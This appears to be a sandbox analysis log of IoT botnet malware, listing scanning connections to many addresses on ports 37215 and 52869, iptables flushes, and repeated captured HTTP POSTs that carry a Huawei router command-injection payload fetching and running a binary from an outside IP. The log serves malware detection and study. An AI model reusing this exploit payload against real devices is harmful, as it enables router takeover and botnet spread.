    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.25.4.177:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.208.164.119:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.222.86.36:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.33.150.185:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.128.111.176:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.108.221.249:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.65.142.50:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.245.182.45:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.174.119.241:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.70.222.167:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.22.118.222:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.158.75.210:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.191.81.155:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.157.4.180:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.183.250.210:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.255.117.138:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.251.147.104:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.116.108.125:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.42.115.250:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.148.184.193:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.236.81.181:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.211.171.30:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.135.16.120:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.246.237.86:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.159.88.253:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.4.199.35:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.1.191.50:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.118.15.2:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.13.144.62:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.179.240.216:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.8.191.197:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.97.120.79:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.104.117.11:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.205.80.155:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.103.84.190:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.248.86.73:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.4.47.49:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.224.103.192:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.156.210.45:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.225.148.119:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.231.21.240:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.5.156.121:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.8.140.79:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.176.235.234:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.234.74.45:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.110.83.47:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.36.214.34:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.129.35.79:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.139.109.104:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.39.9.240:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.168.237.108:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.214.87.170:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.55.222.130:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.90.52.12:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.46.61.144:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.163.242.2:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 197.173.154.146:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.211.117.159:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 41.147.125.220:37215
    Source: global trafficTCP traffic: 192.168.2.23:16756 -> 156.160.234.60:37215
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 156.107.236.75:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 197.168.233.75:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 156.160.2.115:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 41.162.35.174:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 197.111.12.250:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 156.201.236.117:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 41.134.97.49:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 156.172.98.192:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 41.66.179.59:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 197.81.15.64:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 41.233.33.14:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 41.70.118.12:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 156.58.47.62:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 41.125.205.130:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 156.246.196.84:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 197.74.158.74:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 41.54.233.166:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 156.64.188.84:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 41.134.109.238:52869
    Source: global trafficTCP traffic: 192.168.2.23:16500 -> 156.50.248.18:52869
    Source: /usr/sbin/sshd (PID: 5368)Socket: 0.0.0.0::22
    Source: /usr/sbin/sshd (PID: 5368)Socket: [::]::22
    Source: /bin/sh (PID: 5301)Iptables executable: /sbin/iptables -> /sbin/iptables -F
    Source: /bin/sh (PID: 5302)Iptables executable: /sbin/iptables -> /sbin/iptables -X
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
